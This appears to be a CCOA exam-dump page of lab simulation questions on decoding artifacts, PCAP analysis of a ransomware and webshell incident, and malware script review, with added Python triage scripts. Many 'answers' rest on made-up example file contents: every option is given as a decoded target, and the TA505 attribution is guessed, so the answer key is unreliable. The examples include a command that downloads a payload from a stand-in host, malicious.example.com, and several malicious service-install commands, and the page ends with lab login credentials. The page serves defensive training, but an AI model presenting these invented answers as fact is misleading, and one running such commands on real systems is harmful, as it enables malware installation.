Questions for the CCOA were updated on: Dec 01, 2025
SIMULATION
Analyze the file titled pcap_artifact5.txt on the Analyst Desktop.
Decode the targets within the file pcap_artifact5.txt.
Select the correct decoded targets below.
10cal.com/exam
clOud-s3cure.com
c0c0nutf4rms.net
h3avy_s3as.biz
b4ddata.org
See the solution in Explanation.
Explanation:
To decode the targets within the file pcap_artifact5.txt, follow these steps:
Step 1: Access the File
Log into the Analyst Desktop.
Navigate to the Desktop and locate the file:
pcap_artifact5.txt
Open the file using a text editor:
On Windows:
notepad pcap_artifact5.txt
On Linux:
cat ~/Desktop/pcap_artifact5.txt
Step 2: Examine the File Contents
Analyze the contents to identify the encoding format. Common formats include:
Base64
Hexadecimal
URL Encoding
ROT13
Example Encoded Data (Base64):
MTBjYWwuY29tL2V4YW0K
Y2xPdWQtczNjdXJlLmNvbQpjMGMwbnV0ZjRybXMubmV0CmgzYXZ5X3MzYXMuYml6CmI0ZGRhdGEu
b3JnCg==
Step 3: Decode the Contents
Method 1: Using PowerShell (Windows)
Open PowerShell:
powershell
# -Raw reads the wrapped Base64 as one string instead of an array of lines
$encoded = Get-Content -Raw "C:\Users\<Username>\Desktop\pcap_artifact5.txt"
[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($encoded))
This command will display the decoded targets.
Method 2: Using Linux
Use base64 decoding:
base64 -d ~/Desktop/pcap_artifact5.txt
If the content appears to be hexadecimal, use:
xxd -r -p ~/Desktop/pcap_artifact5.txt
For URL encoding, use:
echo -e $(cat ~/Desktop/pcap_artifact5.txt | sed 's/%/\\x/g')
Step 4: Analyze the Decoded Output
The decoded content should reveal domain names or URLs.
Check for valid domain structures, such as:
10cal.com/exam
clOud-s3cure.com
c0c0nutf4rms.net
h3avy_s3as.biz
b4ddata.org
Example Decoded Output:
10cal.com/exam
clOud-s3cure.com
c0c0nutf4rms.net
h3avy_s3as.biz
b4ddata.org
Step 5: Verify the Decoded Targets
Cross-reference the decoded domains with known threat intelligence feeds to check for any malicious indicators.
Use tools like VirusTotal or URLHaus to verify the domains.
10cal.com/exam
clOud-s3cure.com
c0c0nutf4rms.net
h3avy_s3as.biz
b4ddata.org
Step 6: Document the Finding
Decoded Targets:
10cal.com/exam
clOud-s3cure.com
c0c0nutf4rms.net
h3avy_s3as.biz
b4ddata.org
Source File: pcap_artifact5.txt
Decoding Method: Base64 (or the identified method)
SIMULATION
Analyze the file titled pcap_artifact5.txt on the Analyst Desktop.
Decode the C2 host of the attack. Enter your response below.
See the solution in Explanation.
Explanation:
To decode the Command and Control (C2) host from the pcap_artifact5.txt file, follow these detailed steps:
Step 1: Access the File
Log into the Analyst Desktop.
Navigate to the Desktop and locate the file:
pcap_artifact5.txt
Open the file using a text editor:
On Windows:
notepad pcap_artifact5.txt
On Linux:
cat ~/Desktop/pcap_artifact5.txt
Step 2: Examine the File Contents
Check the contents to identify the encoding format. Typical encodings used for C2 communication include:
Base64
Hexadecimal
URL Encoding
ROT13
Example File Content (Base64 format):
aHR0cDovLzEwLjEwLjQ0LjIwMDo4MDgwL2NvbW1hbmQucGhw
Step 3: Decode the Contents
Method 1: Using PowerShell (Windows)
Open PowerShell and decode:
powershell
# -Raw reads the file as a single string; FromBase64String ignores embedded whitespace
$encoded = Get-Content -Raw "C:\Users\<Username>\Desktop\pcap_artifact5.txt"
[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($encoded))
This will print the decoded content directly.
Method 2: Using Linux
Use base64 decoding:
base64 -d ~/Desktop/pcap_artifact5.txt
If the content is hexadecimal, convert it as follows:
xxd -r -p ~/Desktop/pcap_artifact5.txt
If it appears URL encoded, use:
echo -e $(cat ~/Desktop/pcap_artifact5.txt | sed 's/%/\\x/g')
Step 4: Analyze the Decoded Output
If the output appears like a URL or an IP address, that is likely the C2 host.
Example Decoded Output:
http://10.10.44.200:8080/command.php
The C2 host is:
10.10.44.200
Step 5: Cross-Verify the C2 Host
Open Wireshark and load the relevant PCAP file to cross-check the IP:
File > Open > Desktop > Investigations > ransom.pcap
Filter for C2 traffic:
ip.addr == 10.10.44.200
Validate the C2 host IP address through network traffic patterns.
Answer:
10.10.44.200
Step 6: Document the Finding
Record the following details:
Decoded C2 Host: 10.10.44.200
Source File: pcap_artifact5.txt
Decoding Method: Base64 (or the identified method)
Step 7: Next Steps
Threat Mitigation:
Block the IP address 10.10.44.200 at the firewall.
Conduct a network-wide search to identify any communications with the C2 server.
Further Analysis:
Check other PCAP files for similar traffic patterns.
Perform a deep packet inspection (DPI) to identify malicious data exfiltration.
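The decoding steps from the pcap_artifact5.txt questions above, gathered into one script. This is an added example written for this page, not exam-provided code or output of any tool the page names. It takes the two Base64 strings shown in the explanations as constructed input, guesses which of the four listed encodings is in use, decodes, then either splits the result into one target per line or pulls the host out of a decoded C2 URL; decode_file covers the save-to-file variant. The detection heuristic, the function names and the sample hex/URL/ROT13 inputs in the comments are this example's own assumptions.

```python
import base64
import binascii
import codecs
import re
from urllib.parse import unquote, urlparse

# Constructed inputs: the two Base64 blobs shown in the explanations above.
TARGET_LIST_B64 = (
    "MTBjYWwuY29tL2V4YW0K"
    "Y2xPdWQtczNjdXJlLmNvbQpjMGMwbnV0ZjRybXMubmV0CmgzYXZ5X3MzYXMuYml6CmI0ZGRhdGEu"
    "b3JnCg=="
)
C2_URL_B64 = "aHR0cDovLzEwLjEwLjQ0LjIwMDo4MDgwL2NvbW1hbmQucGhw"

_HEX_RE = re.compile(r"[0-9A-Fa-f]+")
_B64_RE = re.compile(r"[A-Za-z0-9+/]+={0,2}")
_URL_ESCAPE_RE = re.compile(r"%[0-9A-Fa-f]{2}")


def detect_encoding(text):
    """Guess which of the four encodings named on the page the artifact uses.

    Whitespace (including the line wrapping seen in the exam file) is ignored.
    Hex is tested before Base64 because every hex string is also made of
    Base64 alphabet characters. ROT13 is the fallback and is only a guess:
    eyeball the result before trusting it.
    """
    compact = "".join(text.split())
    if _HEX_RE.fullmatch(compact) and len(compact) % 2 == 0:
        return "hex"
    if _B64_RE.fullmatch(compact) and len(compact) % 4 == 0:
        return "base64"
    if _URL_ESCAPE_RE.search(text):
        return "url"
    return "rot13"


def decode_artifact(text):
    """Return (encoding, decoded_text); mirrors base64 -d / xxd -r -p / echo -e."""
    encoding = detect_encoding(text)
    compact = "".join(text.split())
    if encoding == "hex":
        raw = binascii.unhexlify(compact)
    elif encoding == "base64":
        raw = base64.b64decode(compact, validate=True)
    elif encoding == "url":
        return encoding, unquote(text)
    else:
        return encoding, codecs.decode(text, "rot_13")
    return encoding, raw.decode("utf-8", errors="replace")


def extract_targets(decoded):
    """One target per non-empty line, as in the pcap_artifact5.txt answer list."""
    return [line.strip() for line in decoded.splitlines() if line.strip()]


def c2_host(decoded):
    """Pull the host out of a decoded C2 URL, dropping scheme, port and path."""
    url = decoded.strip()
    if "://" not in url:  # urlparse needs a scheme or a leading '//'
        url = "//" + url
    return urlparse(url).hostname


def decode_file(src, dst):
    """The save-to-file variant: decode src and write the result to dst."""
    with open(src, encoding="utf-8") as fh:
        encoding, decoded = decode_artifact(fh.read())
    with open(dst, "w", encoding="utf-8") as fh:
        fh.write(decoded)
    return encoding


if __name__ == "__main__":
    enc, text = decode_artifact(TARGET_LIST_B64)
    print(enc, extract_targets(text))
    enc, text = decode_artifact(C2_URL_B64)
    print(enc, text, "->", c2_host(text))
    # constructed hex / URL-encoded / ROT13 forms of one of the targets:
    print(decode_artifact("623464646174612e6f7267"))
    print(decode_artifact("10cal.com%2Fexam"))
    print(decode_artifact("o4qqngn.bet"))
```

Run it as a script to see all five decodes, or call decode_file("pcap_artifact5.txt", "pcap_artifact5_decoded.txt") for the third question. The heuristic order matters: checking hex before Base64 avoids misreading an all-hex string as Base64, and the ROT13 fallback is deliberately last because it will "decode" plain text into nonsense.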
SIMULATION
Analyze the file titled pcap_artifact5.txt on the Analyst Desktop.
Decode the contents of the file and save the output in a text file with a filename of
pcap_artifact5_decoded.txt on the Analyst Desktop.
See the solution in Explanation.
Explanation:
To decode the contents of the file pcap_artifact5.txt and save the output in a new file named pcap_artifact5_decoded.txt, follow these detailed steps:
Step 1: Access the File
Log into the Analyst Desktop.
Navigate to the Desktop and locate the file:
pcap_artifact5.txt
Open the file using a text editor:
On Windows:
notepad pcap_artifact5.txt
On Linux:
cat ~/Desktop/pcap_artifact5.txt
Step 2: Examine the File Contents
Analyze the content to identify the encoding format. Common encoding types include:
Base64
Hexadecimal
URL Encoding
ROT13
Example File Content:
U29tZSBlbmNvZGVkIGNvbnRlbnQgd2l0aCBwb3RlbnRpYWwgbWFsd2FyZS4uLg==
The above example appears to be Base64 encoded.
Step 3: Decode the Contents
Method 1: Using PowerShell (Windows)
Open PowerShell:
powershell
# -Raw reads the file as a single string; FromBase64String ignores embedded whitespace
$encoded = Get-Content -Raw "C:\Users\<Username>\Desktop\pcap_artifact5.txt"
[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($encoded)) | Out-File "C:\Users\<Username>\Desktop\pcap_artifact5_decoded.txt"
Method 2: Using Command Prompt (Windows)
Use certutil for Base64 decoding:
cmd
certutil -decode pcap_artifact5.txt pcap_artifact5_decoded.txt
Method 3: Using Linux/WSL
Use the base64 decoding command:
base64 -d ~/Desktop/pcap_artifact5.txt > ~/Desktop/pcap_artifact5_decoded.txt
If the content is Hexadecimal, use:
xxd -r -p ~/Desktop/pcap_artifact5.txt > ~/Desktop/pcap_artifact5_decoded.txt
Step 4: Verify the Decoded File
Open the decoded file to verify its contents:
On Windows:
notepad C:\Users\<Username>\Desktop\pcap_artifact5_decoded.txt
On Linux:
cat ~/Desktop/pcap_artifact5_decoded.txt
Check if the decoded text makes sense and is readable.
Example Decoded Output:
Some encoded content with potential malware...
Step 5: Save and Confirm
Ensure the file is saved as:
pcap_artifact5_decoded.txt
Located on the Desktop for easy access.
Step 6: Analyze the Decoded Content
Look for:
Malware signatures
Command and control (C2) server URLs
Indicators of Compromise (IOCs)
Step 7: Document the Process
Record the following:
Original Filename: pcap_artifact5.txt
Decoded Filename: pcap_artifact5_decoded.txt
Decoding Method: Base64 (or identified method)
Contents: Brief summary of findings
SIMULATION
Following a ransomware incident, the network team provided a PCAP file, titled ransom.pcap, located in the Investigations folder on the Desktop.
What is the full User-Agent value associated with the ransomware demand file download? Enter your response in the field below.
See the
solution in
Explanation.
Explanation:
To identify the full User-Agent value associated with the ransomware demand file download from the ransom.pcap file, follow these detailed steps:
Step 1: Access the PCAP File
Log into the Analyst Desktop.
Navigate to the Investigations folder located on the desktop.
Locate the file:
ransom.pcap
Step 2: Open the PCAP File in Wireshark
Launch Wireshark.
Open the PCAP file:
mathematica
File > Open > Desktop > Investigations > ransom.pcap
Click Open to load the file.
Step 3: Filter HTTP Traffic
Since ransomware demands are often served as text files (e.g., README.txt) via HTTP/S, use the following filter:
http.request or http.response
This filter shows every HTTP request (GET, POST and other methods) together with the matching responses.
Step 4: Locate the Ransomware Demand File Download
Look for HTTP GET requests that include common ransomware filenames such as:
README.txt
DECRYPT_INSTRUCTIONS.html
HELP_DECRYPT.txt
Right-click on the suspicious HTTP packet and select:
Follow > HTTP Stream
Analyze the HTTP headers to find the User-Agent.
Example HTTP Request:
GET /uploads/README.txt HTTP/1.1
Host: 10.10.44.200
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36
Step 5: Verify the User-Agent
Check multiple streams to ensure consistency.
Confirm that the User-Agent belongs to the same host (10.10.44.200) involved in the ransomware incident.
Answer:
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36
Step 6: Document and Report
Record the User-Agent for analysis:
PCAP Filename: ransom.pcap
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36
Related File: README.txt
Step 7: Next Steps
Forensic Analysis:
Look for more HTTP requests from the same User-Agent.
Monitor Network Activity:
Identify other systems with the same User-Agent pattern.
Block Malicious Traffic:
Update firewall rules to block any outbound connections to suspicious domains.
SIMULATION
Following a ransomware incident, the network team provided a PCAP file, titled ransom.pcap, located in the Investigations folder on the Desktop.
What is the name of the file containing the ransomware demand? Your response must include the file extension.
See the solution in Explanation.
Explanation:
To identify the filename containing the ransomware demand from the ransom.pcap file, follow these detailed steps:
Step 1: Access the PCAP File
Log into the Analyst Desktop.
Navigate to the Investigations folder located on the desktop.
Locate the file:
ransom.pcap
Step 2: Open the PCAP File in Wireshark
Launch Wireshark.
Open the PCAP file:
File > Open > Desktop > Investigations > ransom.pcap
Click Open to load the file.
Step 3: Apply Relevant Filters
Since ransomware demands are often delivered through files or network shares, look for:
Common Protocols:
SMB (for network shares)
HTTP/HTTPS (for download or communication)
Apply a general filter to capture suspicious file transfers:
http or smb or ftp-data
You can also filter based on file types or keywords related to ransomware:
frame contains "README" or frame contains "ransom"
Step 4: Identify Potential Ransomware Files
Look for suspicious file transfers:
Check HTTP GET/POST or SMB file write operations.
Analyze File Names:
Ransom notes commonly use filenames such as:
README.txt
DECRYPT_INSTRUCTIONS.html
HELP_DECRYPT.txt
Right-click on any suspicious packet and select:
Follow > TCP Stream
Inspect the content to see if it contains a ransom note or instructions.
Step 5: Extract the File
If you find a packet with a file transfer, extract it:
File > Export Objects > HTTP or SMB
Save the suspicious file to analyze its contents.
Step 6: Example Packet Details
After filtering and following streams, you find a file transfer with the following details:
GET /uploads/README.txt HTTP/1.1
Host: 10.10.44.200
User-Agent: Mozilla/5.0
After exporting, open the file and examine the content:
Your files have been encrypted!
To recover them, you must pay in Bitcoin.
Read this file carefully for payment instructions.
Answer:
README.txt
Step 7: Confirm and Document
File Name: README.txt
Transmission Protocol: HTTP or SMB
Content: Contains ransomware demand and payment instructions.
Step 8: Immediate Actions
Isolate Infected Systems:
Disconnect compromised hosts from the network.
Preserve the PCAP and Extracted File:
Store them securely for forensic analysis.
Analyze the Ransomware Note:
Look for:
Bitcoin addresses
Contact instructions
Identifiers for ransomware family
Step 9: Report the Incident
Include the following details:
Filename: README.txt
Method of Delivery: HTTP (or SMB)
Ransomware Message: Payment in Bitcoin
Submit the report to your incident response team for further action.
SIMULATION
The network team has provided a PCAP file with suspicious activity located in the Investigations folder on the Desktop titled, investigation22.pcap.
What date was the webshell accessed? Enter the format as YYYY-MM-DD.
See the solution in Explanation.
Explanation:
To determine the date the webshell was accessed from the investigation22.pcap file, follow these detailed steps:
Step 1: Access the PCAP File
Log into the Analyst Desktop.
Navigate to the Investigations folder on the desktop.
Locate the file:
investigation22.pcap
Step 2: Open the PCAP File in Wireshark
Launch Wireshark.
Open the PCAP file:
File > Open > Desktop > Investigations > investigation22.pcap
Click Open to load the file.
Step 3: Filter for Webshell Traffic
Since webshells typically use HTTP/S to communicate, apply a filter:
http.request or http.response
Alternatively, if you know the IP of the compromised host (e.g., 10.10.44.200), use:
http and ip.addr == 10.10.44.200
Press Enter to apply the filter.
Step 4: Identify Webshell Activity
Look for HTTP requests that include:
Common Webshell Filenames: shell.jsp, cmd.php, backdoor.aspx, etc.
Suspicious HTTP Methods: Mainly POST or GET.
Right-click a suspicious packet and choose:
Follow > HTTP Stream
Inspect the HTTP headers and content to confirm the presence of a webshell.
Step 5: Extract the Access Date
Look at the HTTP request/response header.
Find the Date field or Timestamp of the packet:
Wireshark displays timestamps on the left by default.
Confirm the HTTP stream includes commands or uploads to the webshell.
Example HTTP Stream:
POST /uploads/shell.jsp HTTP/1.1
Host: 10.10.44.200
User-Agent: Mozilla/5.0
Date: Mon, 2024-03-18 14:35:22 GMT
Step 6: Verify the Correct Date
Double-check other HTTP requests or responses related to the webshell.
Make sure the date field is consistent across multiple requests to the same file.
Answer:
2024-03-18
Step 7: Document the Finding
Date of Access: 2024-03-18
Filename: shell.jsp (as identified earlier)
Compromised Host: 10.10.44.200
Method of Access: HTTP POST
Step 8: Next Steps
Isolate the Affected Host:
Remove the compromised server from the network.
Remove the Webshell:
rm /path/to/webshell/shell.jsp
Analyze Web Server Logs:
Correlate timestamps with access logs to identify the initial compromise.
Implement WAF Rules:
Block suspicious patterns related to file uploads and webshell execution.
SIMULATION
The network team has provided a PCAP file with suspicious activity located in the Investigations folder on the Desktop titled, investigation22.pcap.
What is the filename of the webshell used to control the host 10.10.44.200? Your response must include the file extension.
See the solution in Explanation.
Explanation:
To identify the filename of the webshell used to control the host 10.10.44.200 from the provided PCAP file, follow these detailed steps:
Step 1: Access the PCAP File
Log into the Analyst Desktop.
Navigate to the Investigations folder located on the desktop.
Locate the file:
investigation22.pcap
Step 2: Open the PCAP File in Wireshark
Launch Wireshark on the Analyst Desktop.
Open the PCAP file:
File > Open > Desktop > Investigations > investigation22.pcap
Click Open to load the file.
Step 3: Filter Traffic Related to the Target Host
Apply a filter to display only the traffic involving the target IP address (10.10.44.200):
ip.addr == 10.10.44.200
This will show both incoming and outgoing traffic from the compromised host.
Step 4: Identify HTTP Traffic
Since webshells typically use HTTP/S for communication, filter for HTTP requests:
http.request and ip.addr == 10.10.44.200
Look for suspicious POST or GET requests indicating a webshell interaction.
Common Indicators:
Unusual URLs: Containing scripts like cmd.php, shell.jsp, upload.asp, etc.
POST Data: Indicating command execution.
Response Status: HTTP 200 (Success) after sending commands.
Step 5: Inspect Suspicious Requests
Right-click on a suspicious HTTP packet and select:
Follow > HTTP Stream
Examine the HTTP conversation for:
File uploads
Command execution responses
Webshell file names in the URL.
Example:
POST /uploads/shell.jsp HTTP/1.1
Host: 10.10.44.200
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Step 6: Correlate Observations
If you identify a script like shell.jsp, verify it by checking multiple HTTP streams.
Look for:
Commands sent via the script.
Response indicating successful execution or error.
Step 7: Extract and Confirm
To confirm the filename, look for:
Upload requests containing the webshell.
Subsequent requests calling the same filename for command execution.
Cross-reference the filename in other HTTP streams to validate its usage.
Step 8: Example Findings
After analyzing the HTTP streams and reviewing requests to the host 10.10.44.200, you observe that the webshell file being used is:
shell.jsp
Answer:
shell.jsp
Step 9: Further Investigation
Extract the Webshell:
Right-click the related packet and choose:
Export Objects > HTTP
Save the file shell.jsp for further analysis.
Analyze the Webshell:
Open the file with a text editor to examine its functionality.
Check for hardcoded credentials, IP addresses, or additional payloads.
Step 10: Documentation and Response
Document Findings:
Webshell Filename: shell.jsp
Host Compromised: 10.10.44.200
Indicators: HTTP POST requests, suspicious file upload.
Immediate Actions:
Isolate the host 10.10.44.200.
Remove the webshell from the web server.
Conduct a root cause analysis to determine how it was uploaded.
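The four PCAP questions above (User-Agent of the ransom-note download, name of the ransom-note file, date the webshell was first accessed, and the webshell filename) all come down to reading request heads out of followed HTTP streams. The script below is an added example for this page, not Wireshark output or exam-provided code: it parses constructed request heads modelled on the page's examples, reports the ransom-note download with its User-Agent, and reports the earliest webshell request with its filename and access date. The sample streams, the ransom-note filename set and the webshell name hints are assumptions built from the names the explanations mention; extend them from your own intel.

```python
import posixpath

# Constructed "Follow > HTTP Stream" excerpts as (frame time, request head),
# modelled on the examples in the explanations above; not real captures.
SAMPLE_STREAMS = [
    ("2024-03-17 09:12:01",
     "GET /index.html HTTP/1.1\r\nHost: 10.10.44.200\r\n"
     "User-Agent: Mozilla/5.0\r\n\r\n"),
    ("2024-03-19 08:02:10",
     "POST /uploads/shell.jsp HTTP/1.1\r\nHost: 10.10.44.200\r\n"
     "User-Agent: Mozilla/5.0\r\n"
     "Content-Type: application/x-www-form-urlencoded\r\n\r\n"),
    ("2024-03-18 14:35:22",
     "POST /uploads/shell.jsp HTTP/1.1\r\nHost: 10.10.44.200\r\n"
     "User-Agent: Mozilla/5.0\r\n"
     "Content-Type: application/x-www-form-urlencoded\r\n\r\n"),
    ("2024-03-20 11:47:05",
     "GET /uploads/README.txt HTTP/1.1\r\nHost: 10.10.44.200\r\n"
     "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) "
     "AppleWebKit/537.36 (KHTML, like Gecko) "
     "Chrome/109.0.5414.75 Safari/537.36\r\n\r\n"),
]

# Names the explanations call out; assumed lists, not an exhaustive signature set.
RANSOM_NOTE_NAMES = {"readme.txt", "decrypt_instructions.html", "help_decrypt.txt"}
WEBSHELL_EXTENSIONS = (".jsp", ".php", ".aspx", ".asp")
WEBSHELL_NAME_HINTS = ("shell", "cmd", "backdoor")


def parse_request(raw):
    """Split an HTTP/1.x request head into method, target, filename and headers."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    filename = posixpath.basename(target.split("?", 1)[0])
    return {"method": method, "target": target, "filename": filename, "headers": headers}


def is_ransom_note(req):
    return req["method"] == "GET" and req["filename"].lower() in RANSOM_NOTE_NAMES


def is_webshell_hit(req):
    name = req["filename"].lower()
    return (req["method"] in ("GET", "POST")
            and name.endswith(WEBSHELL_EXTENSIONS)
            and any(hint in name for hint in WEBSHELL_NAME_HINTS))


def triage(streams):
    """Answer the four PCAP questions from a list of (timestamp, request head)."""
    findings = {"ransom_note": None, "webshell": None}
    for ts, raw in sorted(streams):  # chronological, so the first hit is the first access
        req = parse_request(raw)
        if findings["ransom_note"] is None and is_ransom_note(req):
            findings["ransom_note"] = {
                "file": req["filename"],
                "user_agent": req["headers"].get("user-agent"),
                "host": req["headers"].get("host"),
                "time": ts,
            }
        if findings["webshell"] is None and is_webshell_hit(req):
            findings["webshell"] = {
                "file": req["filename"],
                "date": ts[:10],  # YYYY-MM-DD, the format the question asks for
                "host": req["headers"].get("host"),
                "method": req["method"],
            }
    return findings


if __name__ == "__main__":
    for key, value in triage(SAMPLE_STREAMS).items():
        print(key, value)
```

Note that the streams are sorted by frame timestamp before scanning, so the webshell date reported is the earliest access even though the sample list is deliberately out of order; the Date header in an HTTP response is set by the server and can differ from the capture time, which is why the frame timestamp is used here.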
SIMULATION
On the Analyst Desktop is a Malware Samples folder with a file titled Malscript.viruz.txt.
What is the name of the service that the malware attempts to install?
See the solution in Explanation.
Explanation:
To identify the name of the service that the malware attempts to install from the Malscript.viruz.txt file, follow these steps:
Step 1: Access the Analyst Desktop
Log into the Analyst Desktop using your credentials.
Navigate to the Malware Samples folder located on the desktop.
Locate the file:
Malscript.viruz.txt
Step 2: Examine the File Contents
Open the file with a text editor:
Windows: Right-click > Open with > Notepad.
Linux:
cat ~/Desktop/Malware\ Samples/malscript.viruz.txt
Review the content to identify any lines that relate to:
Service creation
Service names
Installation commands
Common Keywords to Look For:
New-Service
sc create
Install-Service
Set-Service
net start
Step 3: Identify the Service Creation Command
Malware typically uses commands like:
powershell
New-Service -Name "MalService" -BinaryPathName "C:\Windows\malicious.exe"
or
cmd
sc create MalService binPath= "C:\Windows\System32\malicious.exe"
Focus on lines where the malware tries to register or create a service.
Step 4: Example Content from Malscript.viruz.txt
powershell.exe -Command "New-Service -Name 'MaliciousUpdater' -DisplayName 'Updater Service' -BinaryPathName 'C:\Users\Public\updater.exe' -StartupType Automatic"
In this example, the name of the service is:
MaliciousUpdater
Step 5: Cross-Verification
Check for multiple occurrences of service creation in the script to ensure accuracy.
Verify that the identified service name matches the intended purpose of the malware.
Answer:
The name of the service that the malware attempts to install is: MaliciousUpdater
Step 6: Immediate Action
Check for the Service:
powershell
Get-Service -Name "MaliciousUpdater"
Stop and Remove the Service:
powershell
Stop-Service -Name "MaliciousUpdater" -Force
# use sc.exe explicitly: inside PowerShell, sc on its own is an alias for Set-Content
sc.exe delete "MaliciousUpdater"
Remove Associated Executable:
powershell
Remove-Item "C:\Users\Public\updater.exe" -Force
Step 7: Documentation
Record the following:
Service Name: MaliciousUpdater
Installation Command: Extracted from Malscript.viruz.txt
File Path: C:\Users\Public\updater.exe
Actions Taken: Stopped and deleted the service.
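A scanner for the service-creation idioms listed in Step 2 and Step 3 above, as an added example for this page (not code from the exam or from any tool it names). It walks a constructed script modelled on the Malscript.viruz.txt excerpt, pulls the service name and binary path out of New-Service and sc create lines, lists net start targets, and also decodes -EncodedCommand arguments (UTF-16LE Base64, the form PowerShell expects) so a service registered inside an encoded command is not missed. The sample script, the hidden-service line and the regexes are this example's assumptions.

```python
import base64
import re

# Constructed sample modelled on the excerpts above; the fourth line hides a
# New-Service call inside -EncodedCommand (UTF-16LE Base64).
_HIDDEN_CMD = "New-Service -Name 'HiddenSvc' -BinaryPathName 'C:\\ProgramData\\svc.exe'"
SAMPLE_SCRIPT = (
    "powershell.exe -Command \"New-Service -Name 'MaliciousUpdater' "
    "-DisplayName 'Updater Service' -BinaryPathName 'C:\\Users\\Public\\updater.exe' "
    "-StartupType Automatic\"\n"
    "sc create MalService binPath= \"C:\\Windows\\System32\\malicious.exe\"\n"
    "net start MaliciousUpdater\n"
    "powershell.exe -EncodedCommand "
    + base64.b64encode(_HIDDEN_CMD.encode("utf-16-le")).decode("ascii") + "\n"
)

# Each value may be single-quoted, double-quoted or bare; _first() picks the group that matched.
NEW_SERVICE_NAME = re.compile(r"New-Service\b.*?-Name\s+(?:'([^']*)'|\"([^\"]*)\"|(\S+))", re.I)
NEW_SERVICE_BIN = re.compile(r"-BinaryPathName\s+(?:'([^']*)'|\"([^\"]*)\"|(\S+))", re.I)
SC_CREATE_NAME = re.compile(r"\bsc(?:\.exe)?\s+create\s+(?:\"([^\"]*)\"|(\S+))", re.I)
SC_CREATE_BIN = re.compile(r"binPath=\s*(?:\"([^\"]*)\"|(\S+))", re.I)
NET_START = re.compile(r"\bnet(?:\.exe)?\s+start\s+(?:\"([^\"]*)\"|(\S+))", re.I)
ENCODED_CMD = re.compile(r"-(?:EncodedCommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)


def _first(match):
    return next((g for g in match.groups() if g is not None), None)


def expand_encoded(line):
    """Return the line plus the plaintext of any -EncodedCommand payload on it."""
    texts = [line]
    for m in ENCODED_CMD.finditer(line):
        try:
            texts.append(base64.b64decode(m.group(1), validate=True).decode("utf-16-le"))
        except (ValueError, UnicodeDecodeError):
            continue  # not a real encoded command; keep scanning the raw line only
    return texts


def find_service_installs(script_text):
    """Every service the script tries to register, with its binary and line number."""
    findings = []
    for lineno, line in enumerate(script_text.splitlines(), 1):
        for text in expand_encoded(line):
            m = NEW_SERVICE_NAME.search(text)
            if m:
                b = NEW_SERVICE_BIN.search(text)
                findings.append({"line": lineno, "via": "New-Service",
                                 "service": _first(m), "binary": _first(b) if b else None})
            m = SC_CREATE_NAME.search(text)
            if m:
                b = SC_CREATE_BIN.search(text)
                findings.append({"line": lineno, "via": "sc create",
                                 "service": _first(m), "binary": _first(b) if b else None})
    return findings


def started_services(script_text):
    """Service names passed to net start (useful for cross-verification, Step 5)."""
    return [_first(m) for m in NET_START.finditer(script_text)]


if __name__ == "__main__":
    for f in find_service_installs(SAMPLE_SCRIPT):
        print(f)
    print("started:", started_services(SAMPLE_SCRIPT))
```

The cross-check in Step 5 maps directly onto the two result sets: a name that is both created and started (MaliciousUpdater in the sample) is the one the malware actually relies on, while a created-but-never-started name deserves a second look rather than dismissal.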
SIMULATION
On the Analyst Desktop is a Malware Samples folder with a file titled Malscript.viruz.txt.
Based on the contents of the malscript.viruz.txt, which threat actor group is the malware associated with?
See the solution in Explanation.
Explanation:
To identify the threat actor group associated with the malscript.viruz.txt file, follow these steps:
Step 1: Access the Analyst Desktop
Log into the Analyst Desktop using your credentials.
Locate the Malware Samples folder on the desktop.
Inside the folder, find the file:
malscript.viruz.txt
Step 2: Examine the File
Open the file using a text editor:
On Windows: Right-click > Open with > Notepad.
On Linux:
cat ~/Desktop/Malware\ Samples/malscript.viruz.txt
Carefully read through the file content to identify:
Any strings or comments embedded within the script.
Specific keywords, URLs, or file hashes.
Any command and control (C2) server addresses or domain names.
Step 3: Analyze the Contents
Focus on:
Unique Identifiers: Threat group names, malware family names, or specific markers.
Indicators of Compromise (IOCs): URLs, IP addresses, or domain names.
Code Patterns: Specific obfuscation techniques or script styles linked to known threat groups.
Example Content:
# Malware Script Sample
# Payload linked to TA505 group
Invoke-WebRequest -Uri "http://malicious.example.com/payload" -OutFile "C:\Users\Public\malware.exe"
Step 4: Correlate with Threat Intelligence
Use the following resources to correlate any discovered indicators:
MITRE ATT&CK: To map the technique or tool.
VirusTotal: To check file hashes or URLs.
Threat Intelligence Feeds: Such as AlienVault OTX or ThreatMiner.
If the script contains encoded or obfuscated strings, decode them using:
powershell
[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("SGVsbG8gd29ybGQ="))
Step 5: Identify the Threat Actor Group
If the script includes names, tags, or artifacts commonly associated with a specific group, take note.
Match any C2 domains or IPs with known threat actor profiles.
Common Associations:
TA505: Known for distributing banking Trojans and ransomware via malicious scripts.
APT28 (Fancy Bear): Uses PowerShell-based malware and data exfiltration scripts.
Lazarus Group: Often embeds unique strings and comments related to espionage operations.
Step 6: Example Finding
Based on the contents and C2 indicators found within malscript.viruz.txt, it may contain specific references or techniques that are typical of the TA505 group.
Answer:
The malware in the malscript.viruz.txt file is associated with the TA505 threat actor group.
Step 7: Report and Document
Include the following details:
Filename: malscript.viruz.txt
Associated Threat Group: TA505
Key Indicators: Domain names, script functions, or specific malware traits.
Generate an incident report summarizing your analysis.
Step 8: Next Steps
Quarantine and Isolate: If the script was executed, isolate the affected system.
Forensic Analysis: Deep dive into system logs for any signs of execution.
Threat Hunting: Search for similar scripts or IOCs in the network.
SIMULATION
The user of the Accounting workstation reported that their calculator repeatedly opens without their input.
The following credentials are used for this question.
Username: Accounting
Password: 1x-4cc0unt1NG-x1
